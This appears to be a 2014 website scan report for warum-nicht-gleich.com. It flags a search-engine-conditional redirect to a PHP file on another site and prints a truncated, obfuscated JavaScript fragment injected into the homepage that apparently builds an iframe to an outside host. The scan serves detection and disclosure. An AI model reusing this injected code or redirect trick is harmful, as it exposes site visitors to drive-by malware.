Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://warum-nicht-gleich.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: warum-nicht-gleich.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 29 Aug 2014 16:30:20 GMT Location: http://www.musiklehrer-francu.de/images/esd.php Server: Apache/2.2.22 Content-Length: 334 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://warum-nicht-gleich.com/ | 200 OK Content-Length: 6528 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,174,154,157,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,174,154,157,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,153,145,166,166,155,150,163,61,150,166,171,147,157,62,150,151,63,170,166,145,152,62,164,154,164, Antivirus reports:
| ||
http://warum-nicht-gleich.com/test404page.js | 404 Not Found Content-Length: 1502 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=warum-nicht-gleich.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://warum-nicht-gleich.com/
Result: warum-nicht-gleich.com is not infected or malware details are not published yet.
Result: warum-nicht-gleich.com is not infected or malware details are not published yet.